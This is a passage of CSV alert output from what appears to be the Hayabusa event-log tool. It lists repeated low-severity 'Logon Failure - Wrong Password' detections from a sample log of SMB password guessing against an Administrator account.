NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: 